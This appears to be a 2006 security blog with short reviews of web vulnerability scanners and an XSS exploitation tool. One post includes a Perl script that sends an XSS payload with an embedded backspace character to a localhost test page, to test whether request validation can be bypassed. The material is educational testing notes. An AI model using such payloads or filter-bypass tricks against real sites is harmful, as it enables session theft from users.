Monday, July 24, 2006

DIRB

I tried out this URL bruteforcer. The database it has looks impressive. It includes entries categorised in different text files. Although the test extension file looks unnecessary. It has all combinations of 3 alphabets e.g. aaa,aab,...aba...zzz. appended to "test.".

Home page

Description as on sourceforge:
"DIRB - URL Bruteforcer: DIRB is a Web Content Scanner. It looks for hidden Web Objects. It basically works by launching a dictionary based attack against a web server and analizing the response. DIRB main purpose is to help in web application auditing."

Wednesday, July 19, 2006

PAROS

Paros is a well known tool used for testing web application related issues. It includes a spider that walks your application. There is a set of tests you can run which cover commonly found vulnerabilities - XSS, SQL injection.

If you want to attack an application manually, you have a trap option which lets you modify the request that is sent out.

I'm not sure if the spider is intelligent enough to understand javascript links. But you can use other spidering tools from your browser and then scan all urls with paros.

The scan reports generated look very good. They show the vulnerable parameter, injection string used remediation steps etc.

Springenwerk Security Scanner


This is a free XSS scanner available on web. With a few enhancements, this could make a quick scan of your applications possible. This type of scanner is useful for manual pen-testers when they have to try out loads of injection variations. Such a task is tedious to do manually and on each field in the application. This tool generates a report in a nice format.

Following are the features listed on the tool's home page.
  • Finds the most common XSS vulnerabilites
  • Extracts forms and input elements from given webpages and checks them for vulnerabilites
  • Follows the form action targets (1 level)
  • Can check custom HTTP GET and POST data arguments
  • Can use Springenwerk, Firefox or IE in the requests' user agent string
  • Optionally generates an HTML report file with exploits to demonstrate the vulnerabilites
  • Comes with an easy to use GUI
  • Platform independent, written in Python
  • No installation and no super user privileges necessary
  • FREE!

Monday, July 17, 2006

Blogspot XSS
I have accidentaly found a XSS vulnerability on blogspot. But later I found that someone has already reported it here. So there is no need to notify blogspot guys again.

Sunday, July 16, 2006

Did I find XSS vulnerability in .NET and PHP?

This funny incident happened this week. I was too excited after I
found a vulnerability in .NET security class. Yes, I wondered how
easily could I find it. I patted on my back for this amazing finding. I
though I was gonna shock the entire world.
Then I went on to trying the same method out on Apache-PHP. And voila! it worked too.



I know you are curious to know what the vulnerability was. But hold
back. I'll describe the experiment I conducted and then you decide
whether you are still curious!


I had built a asp page
which I used for testing purpose.
As usual I tried exploiting it with simple strings. Lets say the page
URL was http://localhost/page.aspx?param=abc. This page just echoed
back the value of param.


I tried URL's like http://localhost/page.aspx?param=<script>
I observed that .NET threw an exception when I injected anything that looked like a tag.


Then my intelligence(I thought I was very intelligent and too smart)
started playing its role. "Why not send illegal characters" I thought
"Let me start with a backspace". Really , it according to me was a
brilliant idea!

I decided to use PERL script and fire a malicious request. Which gave rise to following script:

$attack = "<\x08script>alert(123)</script>";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv",
Timeout => 10, PeerPort=>"($port)") or die "[+] Connecting ...
Could not connect to host.\n\n";


$req = "";
$req = $req . "GET http://localhost/page.aspx?param=$attack HTTP/1.0\r\n";
$req = $req . "Host: ".$serv."\r\n";
$req = $req . "Content-type: application/x-www-form-urlencoded\r\n";
$req = $req . "Content-length: 0\r\n";
$req = $req . "Connection: Close\r\n\r\n";

print $sock $req;


And I used following code to read the response

while ($answer = <$sock>)
{
print $answer;
}


I ran the script, and got following in the output:
<script>alert(123)</script>

It meant that the applications relying on .NET security were threatened if
this input went into a database and got reflected back (Stored XSS).

The same script was run against PHP/Apache. Results were the same! Great, isn't it?

Which was conclusive enough to say that .NET security check could be bypassed.

Think about it. Was this an indication of a vulnerability? Was this evidence enough to conclude the vulnerability?


Answer: I've saved the answer as draft. I'll publish it later. Any guesses?

Tuesday, July 04, 2006

Amazing XSS exploit tool

http://xss-proxy.sourceforge.net/

Many people think that XSS (cross site scripting) is not very dangerous. This tool explains why and how XSS can be used in order to retrieve sensitive information without knowing much about the web technologies. Anyone who just knows what XSS is, how to run a perl script (you just need to know how to run it, you need not know perl!) and the vulnerable site's user he/she wants to attck can do it with a few mouse clicks!

Great work done by Anton Rager.